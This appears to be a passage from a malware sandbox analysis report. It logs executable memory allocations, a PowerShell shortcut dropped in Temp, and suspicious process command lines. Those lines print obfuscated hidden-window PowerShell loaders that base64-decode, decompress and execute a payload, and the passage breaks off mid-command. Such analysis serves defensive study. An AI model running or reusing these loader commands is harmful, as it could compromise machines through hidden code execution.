NtProtectVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02901000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02902000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02821000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02822000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02823000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02824000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02825000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02826000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02827000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02828000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02829000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0282a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0282b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0282c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0282d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0282e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0282f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:03 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAEgH62UCA7VWbW/iOBD+vtL+h2iFRNBSEl6u21Za6RzSAG2hgRQoZdHJTZzEixPTxCmle/vfbxxIy9'+'62q95Ja4nWsWfG42eembGfxa6gPFbilvLt/TtlN2yc4EhRSzw1xlWllDUrz3ulNDs'+'8Uj4r6hytViaPMI0XJyftLElILLbftQ4RKE1JdMsoSdWK8rcyDUlCDi5vvxJXKN+U0l+1DuO3mO3ENm3shkQ5QLEn9y64i6VbNWfFqFDLX76UK/OD+qJ2epdhlqplZ5MKEtU8xsoV5XtFHni1WRG13KduwlPui9qUxs1GbRyn2CcDsHZP+kSE3EvLcJnn6yREZEm8vZU0sxVSyzC1E+4iz0tImparylweMF8s/lTnu9NHWSxoRGq9WJCErxyS3FOXpLUujj1GRsRfgJ{1}jE'+'hoHi0oFxO75kqilOGOsqvwXM+qArAvs3qqk7iuBlC2SShVC+sI9+9zLGNlqll9wNKdBBcaWCgDfd4mg/8Sdwxe487xQjHm+Q8Bf1e{1}pzVU'+'/K3pV6cPJWPBkA5+lqyQjlcUT2krp0R4l1bdaqxeqoEgm68{1}5rM0nnHqLZws/hL+0nPm9rpR6nc0m8WlMzE2MI+oWhFVfCgrxGckxqRVi'+'A/BRLe82iGcSRgIsJMySGz+pnUZUPOkaGWUeSZALgU3BK4h55UdntpFTy724TyIAcPsNZC35kCakkN6lxq{1}4XX6DULnNcJpWFTuDPHWr'+'ikM'+'wI15VQXFKd1s'+'oEzyflp/d7WdMUBenojC3qPwbz'+'925bR6nIslc'+'iC1gcOWsiEsxk5BUlS71iLFxaFCcX34RkDZmDPIHLN1DQGBFAuEIyZgEXM3ZUak5RPSiFSMRyOSFw2I4gDKxy5Kc{1}jggXvk1T4ts2FJf{1}lOAsucnBNxhXFSVCU0E1CGJc06y/+XHzyVo61A7IbsQqUWmz{1}2NkMlQehyZA8nVHU45KokARKyERwZOyWFrW2/UD9oltRGMWS9mfe9sSeu9Nfz68BvTZo/3/SNb6Dzqu+3U7lhHiK6DtXs0QK535pFjZ9ISzmlPtG3UHVLdaIWuoV'+'/JeT0IkHd54RjhM'+'HSZbptdzZmlOl13p9LW1obbanWvddRsti6b+hIQn'+'IHeEnmDiK4fLmDuShtGLzX0Hjs9'+'a49upw3rZsq6WssK/SlPncOZqWnas{1}fN/g{1}hg3vN/ua6PuJXXTcyWjHXj'+'tutJTpFqB2fTiyDn8+MBNnaBAcrjoafmjwK2ujswaDkZji2jOHQMtC48/XOPN{1}C7Xh6jUNjOmnQm9X1KIRva90dnmt6q+eRR04lcB2OcGjyUzm3PM984JZ5a66ENa1PBp2P6cPZ'+'Ne5fJJeWptWnIBuMwF7QbrihD/bMj8j4OOBpAy8Njgxp4+{1}OdcLZyrIZ7F+NGxxN2OAao4ubjbQxs1uoq/NpJ0BD'+'EMeBMcQovTcfTa0+8bg3/WMw87XJNfukme2hH{1}41OVbkHv6uu+a5e1Nfu5efji6mdBJxB'+'NuTD0Cg+ZjGotl{'+'1}lB58WW3fvyt5kz0KvdZH+jhJQ8yAWtAgikS3eGLtir7NqdRQVXg4LEkSEwbNFtpxkRuIMe7KhgPNAVrdtgHJfjju5e68NKsoT'+'4KV5zZULJ2c3ICHMtUgCWoXJA5EWNUfmroOLUR/0Ft5Tr39Xm2+2qi5sapsQgBL{1}ZvltsEc9RVV/d1IwStDQLF7DavX{1}INzl1C{1}oFRuS4UEz+Cc7UOX3+mJAPu4AWB1uPRcvi6AGaB9QO6UkpDNd7+Zl0T4O8myq3Uh/PN+TZbntV/svolAelXC8tPijwt7feK3XX6KqQA5B8o1I9uHxEs{1}7HJjL6o57/3dkI/ry0wcDOCxlreLfwAg25Q40wsAAA{0}{0}')-f'=','Y')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARQBnAEgANgAyAFUAQwBBADcAVgBXAGIAVwAvAGkATwBCAEQAKwB2AHQATAArAGgAMgBpAEYAUgBOAEIAUwBFAGwANgB1ADIAMQBaAGEANgBSAHoAUwBBAEcAMgBoAGcAUgBRAG8AWgBkAEgASgBUAFoAegBFAGkAeABQAFQAeABDAG0AbABlAC8AdgBmAGIAeAB4AEkAeQA5ACcAJwArACcAJwA2ADIAcQA5ADUASgBhADQAbgBXAHMAVwBmAEcANAAyAGUAZQBtAGIARwBmAHgAYQA2AGcAUABGAGIAaQBsAHYATAB0AC8AVAB0AGwATgAyAHkAYwA0AEUAaABSAFMAegB3ADEAeABsAFcAbABsAEQAVQByAHoAMwB1AGwATgBEAHMAJwAnACsAJwAnADgAVQBqADQAcgA2AGgAeQB0AFYAaQBhAFAATQBJADAAWABKAHkAZgB0AEwARQBsAEkATABMAGIAZgB0AFEANABSAEsARQAxAEoAZABNAHMAbwBTAGQAVwBLADgAcgBjAHkARABVAGwAQwBEAGkANQB2AHYAeABKAFgASwBOACsAVQAwAGwAKwAxAEQAdQBPADMAbQBPADMARQBOAG0AMwBzAGgAawBRADUAUQBMAEUAbgA5AHkANgA0AGkANgBWAGIATgBXAGYARgBxAEYARABMAFgANwA2AFUASwAvAE8ARAArAHEASgAyAGUAcABkAGgAbABxAHAAbABaADUATQBLAEUAdABVADgAeABzAG8AVgA1AFgAdABGAEgAbgBpADEAVwBSAEcAMQAzAEsAZAB1AHcAbABQAHUAaQA5AHEAVQB4AHMAMQBHAGIAUgB5AG4AMgBDAGMARABzAEgAWgBQACsAawBTAEUAMwBFAHYATABjAEoAbgBuADYAeQBSAEUAWgBFAG0AOAB2AFoAVQAwAHMAeABWAFMAeQB6AEMAMQBFACsANABpAHoAMAB0AEkAbQBwAGEAcgB5AGwAdwBlAE0ARgA4AHMALwBsAFQAbgB1ADkATgBIAFcAUwB4AG8AUgBHAHEAOQBXAEoAQwBFAHIAeAB5AFMAMwBGAE8AWABwAEwAVQB1AGoAagAxAEcAUgBzAFIAZgBnAEoAewAxAH0AagBFACcAJwArACcAJwBoAG8ASABpADAAbwBGAHgATwA3ADUAawBxAGkAbABPAEcATwBzAHEAdgB3AFgATQArAHEAQQByAEEAdgBzADMAcQBxAGsANwBpAHUAQgBsAEMAMgBTAFMAaABWAEMAKwBzAEkAOQArADkAegBMAEcATgBsAHEAbABsADkAdwBOAEsAZABCAEIAYwBhAFcAQwBnAEQAZgBkADQAbQBnAC8AOABTAGQAdwB4AGUANAA4ADcAeABRAGoASABtACsAUQA4AEIAZgAxAGUAewAxAH0AcAB6AFYAVQAnACcAKwAnACcALwBLADMAcABWADYAYwBQAEoAVwBQAEIAawBBADUAKwBsAHEAeQBRAGoAbABjAFUAVAAyAGsAcgBwADAAUgA0AGwAMQBiAGQAYQBxAHgAZQBxAG8ARQBnAG0ANgA4AHsAMQB9ADUAcgBNADAAbgBuAEgAcQBMAFoAdwBzAC8AaABMACsAMABuAFAAbQA5AHIAcABSADYAbgBjADAAbQA4AFcAbABNAHoARQAyAE0ASQArAG8AVwBoAEYAVgBmAEMAZwByAHgARwBjAGsAeABxAFIAVgBpACcAJwArACcAJwBBAC8AQgBSAEwAZQA4ADIAaQBHAGMAUwBSAGcASQBzAEoATQB5AFMARwB6ACsAcABuAFUAWgBVAFAATwBrAGEARwBXAFUAZQBTAFoAQQBMAGcAVQAzAEIASwA0AGgANQA1AFUAZABuAHQAcABGAFQAeQA3ADIANABUAHkASQBBAGMAUABzAE4AWgBDADMANQBrAEMAYQBrAGsATgA2AGwAeABxAHsAMQB9ADQAWABYADYARABVAEwAbgBOAGMASgBwAFcARgBUAHUARABQAEgAVwByACcAJwArACcAJwBpAGsATQAnACcAKwAnACcAdwBJADEANQBWAFEAWABGAEsAZAAxAHMAJwAnACsAJwAnAG8ARQB6AHkAZgBsAHAALwBkADcAVwBkAE0AVQBCAGUAbgBvAGoAQwAzAHEAUAB3AGIAegAnACcAKwAnACcAOQAyADUAYgBSADYAbgBJAHMAbABjACcAJwArACcAJwBpAEMAMQBnAGMATwBXAHMAaQBFAHMAeABrADUAQgBVAGwAUwA3ADEAaQBMAEYAeABhAEYAQwBjAFgAMwA0AFIAawBEAFoAbQBEAFAASQBIAEwATgAxAEQAUQBHAEIARgBBAHUARQBJAHkAWgBnAEUAWABNADMAWgBVAGEAawA1AFIAUABTAGkARgBTAE0AUgB5AE8AUwBGAHcAMgBJADQAZwBEAEsAeAB5ADUASwBjAHsAMQB9AGoAZwBnAFgAdgBrADEAVAA0AHQAcwAyAEYASgBmAHsAMQB9AGwATwBBAHMAdQBjAG4AQgBOAHgAaABYAEYAUwBWAEMAVQAwAEUAMQBDAEcASgBjADAANgB5AC8AKwBYAEgAegB5AFYAbwA2ADEAQQA3AEkAYgBzAFEAcQBVAFcAbQB6AHsAMQB9ADIATgBrAE0AbABRAGUAaAB5AFoAQQA4AG4AVgBIAFUANAA1AEsAbwBrAEEAUgBLAHkARQBSAHcAWgBPAHkAVwBGAHIAVwAyAC8AVQBEADkAbwBsAHQAUgBHAE0AVwBTADkAbQBmAGUAOQBzAFMAZQB1ADkATgBmAHoANgA4AEIAdgBUAFoAbwAvADMALwBTAE4AYgA2AEQAegBxAHUAKwAzAFUANwBsAGgASABpAEsANgBEAHQAWABzADAAUQBLADUAMwA1AHAARgBqAFoAOQBJAFMAegBtAGwAUAB0AEcAMwBVAEgAVgBMAGQAYQBJAFcAdQBvAFYAJwAnACsAJwAnAC8ASgBlAFQAMABJAGsASABkADUANABSAGoAaABNACcAJwArACcAJwBIAFMAWgBiAHAAdABkAHoAWgBtAGwATwBsADEAMwBwADkATABXADEAbwBiAGIAYQBuAFcAdgBkAGQAUgBzAHQAaQA2AGIAKwBoAEkAUQBuACcAJwArACcAJwBJAEgAZQBFAG4AbQBEAGkASwA0AGYATABtAEQAdQBTAGgAdABHAEwAegBYADAASABqAHMAOQAnACcAKwAnACcAYQA0ADkAdQBwAHcAMwByAFoAcwBxADYAVwBzAHMASwAvAFMAbABQAG4AYwBPAFoAcQBXAG4AYQBzAHsAMQB9AGYATgAvAGcAewAxAH0AaABnADMAdgBOAC8AdQBhADYAUAB1AEoAWABYAFQAYwB5AFcAagBIAFgAagAnACcAKwAnACcAdAB1AHQASgBUAHAARgBxAEIAMgBmAFQAaQB5AEQAbgA4ACsATQBCAE4AbgBhAEIAQQBjAHIAagBvAGEAZgBtAGoAdwBLADIAdQBqAHMAdwBhAEQAawBaAGoAaQAyAGoATwBIAFEATQB0AEMANAA4AC8AWABPAFAATgB7ADEAfQBDADcAWABoADYAagBVAE4AagBPAG0AbgBRAG0AOQBYADEASwBJAFIAdgBhADkAMABkAG4AbQB0ADYAcQArAGUAUgBSADAANABsAGMAQgAyAE8AYwBHAGoAeQBVAHoAbQAzAFAATQA5ADgANABKAFoANQBhADYANgBFAE4AYQAxAFAAQgBwADIAUAA2AGMAUABaACcAJwArACcAJwBOAGUANQBmAEoASgBlAFcAcAB0AFcAbgBJAEIAdQBNAHcARgA3AFEAYgByAGkAaABEAC8AYgBNAGoAOABqADQATwBPAEIAcABBAHkAOABOAGoAZwB4AHAANAArAHsAMQB9AE8AZABjAEwAWgB5AHIASQBaADcARgArAE4ARwB4AHgATgAyAE8AQQBhAG8ANAB1AGIAagBiAFEAeABzADEAdQBvAHEALwBOAHAASgAwAEIARAAnACcAKwAnACcARQBNAGUAQgBNAGMAUQBvAHYAVABjAGYAVABhADAAKwA4AGIAZwAzAC8AVwBNAHcAOAA3AFgASgBOAGYAdQBrAG0AZQAyAGgASAB7ADEAfQA0ADEATwBWAGIAawBIAHYANgB1AHUAKwBhADUAZQAxAE4AZgB1ADUAZQBmAGoAaQA2AG0AZABCAEoAeABCACcAJwArACcAJwBOAHUAVABEADAAQwBnACsAWgBqAEcAbwB0AGwAewAnACcAKwAnACcAMQB9AGwAQgA1ADgAVwBXADMAZgB2AHkAdAA1AGsAegAwAEsAdgBkAFoASAArAGoAaABKAFEAOAB5AEEAVwB0AEEAZwBpAGsAUwAzAGUARwBMAHQAaQByADcATgBxAGQAUgBRAFYAWABnADQATABFAGsAUwBFAHcAYgBOAEYAdABwAHgAawBSAHUASQBNAGUANwBLAGgAZwBQAE4AQQBWAHIAZAB0AGcASABKAGYAagBqAHUANQBlADYAOABOAEsAcwBvAFQAJwAnACsAJwAnADQASwBWADUAegBaAFUATABKADIAYwAzAEkAQwBIAE0AdABVAGcAQwBXAG8AWABKAEEANQBFAFcATgBVAGYAbQByAG8ATwBMAFUAUgAvADAARgB0ADUAVAByADMAOQBYAG0AMgArADIAcQBpADUAcwBhAHAAcwBRAGcAQgBMAHsAMQB9AFoAdgBsAHQAcwBFAGMAOQBSAFYAVgAvAGQAMQBJAHcAUwB0AEQAUQBMAEYANwBEAGEAdgBYAHsAMQB9AEkATgB6AGwAMQBDAHsAMQB9AG8ARgBSAHUAUwA0AFUARQB6ACsAQwBjADcAVQBPAFgAMwArAG0ASgBBAFAAdQA0AEEAVwBCADEAd